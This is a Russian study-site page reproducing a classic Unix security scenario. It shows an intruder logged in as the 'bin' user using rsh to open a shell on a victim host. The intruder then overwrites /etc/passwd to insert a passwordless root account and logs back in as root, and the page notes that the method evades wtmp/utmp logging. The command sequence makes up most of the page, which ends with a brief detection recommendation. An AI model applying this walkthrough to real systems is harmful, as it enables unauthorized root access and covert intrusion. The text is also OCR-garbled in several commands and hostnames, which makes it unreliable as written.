Студопедия.Орг Главная | Случайная страница | Контакты | Мы поможем в написании вашей работы!  
 

Сценарию 4



Проникновение в систему с помощью rsh

Поскольку специальный пользователь bin, как правило, имеет доступ к

Ключевым файлам и каталогам, то, зарегистрировавшись как bin, может

Изменить файл паролей так, чтобы получить привилегии доступа root.

Например:

evil % whoami

Bin

evil % rsh victim, corn csh -i

Warning: no access to tty; thus no job control in this shell...

victim % Is -ldg /etc

drwxr-sr-x 8 bin staff 2048 Jul 24 18:02 /etc

victim % cd /etc

victim % mv passwd pw.old

victim % (echo toor:: 0:1: суперпользователь без пароля:/:/bin/sh; cat

pw.old) " passwd

victim % `D

evil % riogin victim, corn -I toor Welcome to victim, corn!

victim #

Несколько замечаний no поводу деталей приведенного выше метода: "rsh

victim.com csh -i" используется для проникновения в систему, так как при

Таком запуске csh не оставляет никаких следов в файлах учета wtmp или

Utmp, делая rsh невидимым для finger или who. Правда, при этом удаленный

Командный процессор не подключается к псевдотерминалу, и полноэкранные

Программы (например, редакторы) работать не будут. На многих системах

Атака с помощью rsh (в случае успешного завершения) оставалась абсолютно

Незамеченной, поэтому мы рекомендуем использовать анализатор внешних

Tcp-нодключений, который поможет обнаружить такую деятельность.





Дата публикования: 2014-11-04; Прочитано: 422 | Нарушение авторского права страницы | Мы поможем в написании вашей работы!



studopedia.org - Студопедия.Орг - 2014-2024 год. Студопедия не является автором материалов, которые размещены. Но предоставляет возможность бесплатного использования (0.006 с)...